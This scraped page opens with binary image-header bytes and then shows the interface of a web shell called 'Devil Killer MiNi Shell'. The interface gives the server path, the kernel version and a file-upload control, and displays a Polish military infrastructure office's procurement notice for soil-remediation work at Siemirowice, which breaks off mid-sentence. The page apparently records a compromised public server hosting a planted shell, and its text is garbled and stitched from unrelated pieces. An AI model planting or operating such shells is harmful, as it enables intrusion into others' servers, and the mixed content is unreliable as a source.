JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211109/0026214601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Realizacja projektu planu remediacji historycznego zanieczyszczenia powierzchni ziemi w rejonie MPS 1 JW 4653 Siemirowice . </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Rejonowy Zarząd Infrastruktury w Gdyni</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Sekcja Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 19005559700000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">JANA Z KOLNA 8B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-301</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261266139</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rzigdynia.kancelaria@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rzigdynia.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Realizacja projektu planu remediacji historycznego zanieczyszczenia powierzchni ziemi w rejonie MPS 1 JW 4653 Siemirowice . </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c74336e9-412c-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00262146</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00018479/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Remediacja środowiska gruntowo-wodnego w rejonie MPS 1 JW 4653 Siemirowice - kontynuacja</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/rzi_gdynia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja pomiędzy zamawiającym a wykonawcami odbywa przy użyciu środków komunikacji elektronicznej tj. przy użyciu Platformy zakupowej Rejonowego Zarządu Infrastruktury w Gdyni platformazakupowa.pl/pn/rzi_gdynia<br/><br/>2.Zamawiający informuje, że Instrukcje korzystania <br/>z platformazakupowa.pl/pn/rzi_gdynia dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platfromazakupowa.pl/pn/rzi_gdynia znajdują się w zakładce „Instrukcje <br/>dla Wykonawców” na stronie internetowej pod adresem:<br/>platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia <br/>30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl/pn/rzi_gdynia, tj.: <br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, <br/>b)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. <br/>2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden<br/> z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, <br/>c)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d)	włączona obsługa JavaScript, <br/>e)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, <br/>f)	platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, <br/>g)	oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. <br/>Maksymalny rozmiar jednego pliku przysyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku maksymalnie 500 MB.<br/>Formaty plików wykorzystywanych przez wykonawców powinny być zgodne <br/>z „Obwieszczeniem Prezesa Rady Ministrów z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”. <br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) <br/>ze szczególnym wskazaniem na .pdf.<br/>W celu ewentualnej kompresji danych zamawiający rekomenduje wykorzystanie jednego z formatów: <br/>a)	.zip <br/>b)	.7Z <br/>Wśród formatów powszechnych a nie występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. <br/>Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości <br/>plików podpisywanych w aplikacji eDoApp służącej do składania podpisu <br/>osobistego, który wynosi max 5MB. <br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez wykonawcę za pośrednictwem platformazakupowa.pl/pn/rzi_gdynia<br/>Zamawiający dopuszcza w sytuacji awaryjnej np. w przypadku braku działania Platformy zakupowej możliwość składania elektronicznych dokumentów <br/>(za wyjątkiem oferty), oświadczeń lub elektronicznych kopii dokumentów <br/>za pomocą poczty elektronicznej rzigdynia.kancelaria@ron.mil.pl W sytuacji awaryjnej, o której mowa w ust. 13 zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej rzigdynia.przetargi@ron.mil.pl.<br/>W formularzu oferty wykonawca zobowiązany jest podać adres e-mail, <br/>w celu umożliwienia prowadzenia korespondencji związanej z postępowaniem.<br/>Za datę złożenia oferty przyjmuje się datę jej przekazania w systemie (platformie) w drugim kroku składania oferty poprzez kliknięcie przycisku „Złóż ofertę” i wyświetlenie się komunikatu, że oferta została zaszyfrowana i złożona.<br/>	Za datę przekazania (wpływu) składanych dokumentów, oświadczeń, wniosków, zawiadomień, zapytań oraz przekazanie informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl/pn/rzi_gdynia poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po którym pojawi się komunikat, że wiadomość została wysłana do zamawiającego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych zawarta jest w załaczniku nr 12 do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych zawarta jest w załaczniku nr 12 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">16/III/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia został opisany w następujących dokumentach:<br/>1)	Harmonogramie i zakresie zleconych prac – załącznik nr 12 do SWZ,<br/>2)	Harmonogramie rzeczowym realizacji prac - załącznik nr 13 do SWZ,<br/>3)	Opisie przedmiotu zamówienia–załącznik 14 do SWZ,<br/>4)	Projekcie planu remediacji historycznego zanieczyszczenia powierzchni ziemi w rejonie MPS - 1 JW 4653 w Siemirowicach, B. Minkiewicz, czerwiec 2021 r. –załącznik 15 do SWZ,<br/>5)	Dokumentacji wynikowej z wykonania otworów technologicznych (wielofunkcyjnych i aeracyjno-infiltracyjnych) dla prac remediacyjnych <br/>w rejonie MPS-1 na terenie JW. 4653 w Siemirowicach, G. Sideł, J. Wójtowicz, M.Szrek, luty 2015 r. – załącznik 16 do SWZ,<br/>6)	Dokumentacji z wykonania otworów wielofunkcyjnych i monitoringowych <br/>w ramach rozbudowy systemów oczyszczania środowiska gruntowo-wodnego w rejonie MPS-1 na terenie JW. 4653 w Siemirowicach oraz terenów przyległych, J. Szczepanek, R. Ołownia, czerwiec 2017 r. – załącznik 17 do SWZ,<br/>7)	Sprawozdaniu z prac remediacyjnych zrealizowanych w okresie 2015-2021 na terenie MPS-1 w obrębie JW 4653 w Siemirowicach, M. Szrek, A. Perlak, marzec 2021 r. – załącznik 18 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90730000-3 - Śledzenie zanieczyszczeń, monitoring i rekultywacja</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90711500-9 - Monitoring środowiska naturalnego inny niż dotyczący branży budowlanej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 <br/>pkt 7) ustawy Pzp, dotychczasowemu wykonawcy usług, polegających <br/>na powtórzeniu podobnych usług, określonych w rozdziale III Opisu przedmiotu zamówienia (załącznik 14 do SWZ) - na łączną kwotę nie przekraczającą 50 % wartości zamówienia podstawowego, określoną przez zamawiającego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z Rozdziałem XXVIII.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2)	termin wykonania otworów badawczych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">3)	termin złożenia do RZI uzgodnionego w RZI sprawozdania końcowego dokumentującego osiągnięty efekt ekologiczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>a)	sytuacji ekonomicznej lub finansowej tj. posiadają ubezpieczenie <br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą <br/>niż 150.000,00 zł;<br/>b)	zdolności technicznej lub zawodowej, tj.: wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej <br/>5 usług odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia tj.:<br/>- co najmniej 3 usługi z zakresu prac związanych z badaniem stanu stopnia zanieczyszczenia środowiska gruntowo-wodnego<br/>oraz<br/>-co najmniej 2 usługi z zakresu projektowania prac remediacyjnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wezwie do złożenia podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty każdy wykonawca musi dołączyć oświadczenie oświadczenie o spełnieniu warunków udziału w postępowaniu wskazanym w załączniku nr 3 do SWZ. <br/>Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1)	dokumentu potwierdzającego, że wykonawca jest ubezpieczony <br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia na minimalną sumę gwarancyjną w wysokości 150.000,00 zł,<br/>2)	wykazu wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 5 usług odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia tj.:<br/>-co najmniej 3 usług z zakresu prac związanych z badaniem stanu stopnia zanieczyszczenia środowiska gruntowo-wodnego<br/>oraz<br/>-co najmniej 2 usług z zakresu projektowania prac remediacyjnych.<br/>wraz z podaniem ich rodzaju, dat i miejsca wykonania oraz podmiotów na rzecz których te usługi zostały wykonane, przy czym wykazanie wykonania więcej <br/>niż jednego z wymaganych rodzajów usług w jednym zrealizowanym zleceniu uznaje się za potwierdzenie wykonania każdej z usług oddzielnie – zgodnego <br/>z załącznikiem nr 9 do SWZ.<br/>3)	dowody określające czy te usługi zostały wykonane w sposób należyty,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego te usługi zostały wykonane, <br/>a jeżeli wykonawca, z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Każdy wykonawca wraz z ofertą musi złożyć przedmiotowy środek dowodowy, <br/>tj. wskaże w druku oferty laboratorium (pełna nazwa i adres), w którym realizowane będą usługi w zakresie poboru prób i wykonywania oznaczeń będących przedmiotem umowy, zgodnie z art. 147a ust. 1 pkt 1 lub ust. 1a ustawy Prawo ochrony środowiska oraz załączy do oferty kopię certyfikatu akredytacji PCA lub inny dokument potwierdzający posiadane uprawnienia przez te laboratorium w zakresie poborów prób i oznaczeń będących przedmiotem umowy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne zamawiający wezwie <br/>do ich złożenia lub uzupełnienia w wyznaczonym terminie <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 3.000,00 zł (słownie: trzy tysiące złotych 00/100).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust.1 pkt 2) i 3) oraz ust. 2 ustawy Pzp.<br/>3.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu<br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego nr 68 1010 1140 0172 6813 9120 1000 tytułem: „Wadium - Sprawa 16/III/2021: Realizacja projektu planu remediacji historycznego zanieczyszczenia powierzchni ziemi w rejonie MPS 1 JW 4653 Siemirowice”.<br/>5. W przypadku wnoszenia wadium w formie pieniężnej za termin jego wniesienia zostanie przyjęty termin uznania rachunku zamawiającego, o którym mowa w ust. 4 przed terminem składania ofert tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert.<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>7. Wadium wnoszone w formie gwarancji lub poręczenia musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium określone w art. 98 ust. 6 ustawy Pzp.<br/>8. Wadium wnoszone w formie gwarancji lub poręczenia musi zawierać zapis, <br/>że w przypadku ziszczenia się najmniej jednej przesłanki utraty wadium, określonej w art. 98 ust. 6 ustawy Pzp Gwarant podejmie się bezwarunkowo <br/>i nieodwołalnie do wypłacenia zamawiającemu wymaganej kwoty wadium, <br/>po otrzymaniu pierwszego pisemnego wezwania zamawiającego.<br/>9. W przypadku wnoszenia wadium w formie gwarancji lub poręczenia przez wykonawców wspólnie ubiegających się o zamówienie (konsorcjum) zamawiający uzna prawidłowość tych dokumentów jako zabezpieczenia oferty jeżeli:<br/>1)	w dokumencie gwarancji lub poręczenia jako wykonawcę (zobowiązanego) wskaże się wszystkie podmioty należące do konsorcjum lub<br/>2)	w dokumencie gwarancji lub poręczenia zawrze się informację, że przez wykonawcę (zobowiązanego) należy rozumieć nie tylko podmiot oznaczony <br/>w dokumencie gwarancji/poręczenia, ale i wszystkich wykonawców z którymi zdecydował się on złożyć ofertę.<br/>10. Składane tytułem wadium gwarancje lub poręczenia nie mogą uzależniać wypłaty wadium zamawiającemu od oświadczenia woli wykonawcy w przedmiocie wymagalności i zasadności wypłaty.<br/>11. Składane tytułem wadium gwarancje lub poręczenia nie mogą zawierać zastrzeżenia, że doręczenie żądania wypłaty musi odbyć się za pośrednictwem osób trzecich, np. za pośrednictwem banku.<br/>12. Składane tytułem wadium gwarancje lub poręczenia nie mogą zawierać zastrzeżenia, że podpisy złożone na oryginale wezwania do zapłaty muszą być poświadczone notarialnie lub przez bank prowadzący rachunek zamawiającego.<br/>13. Zamawiający odrzuci ofertę wykonawcy, który nie wniósł wadium lub wniósł wadium w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie <br/>do 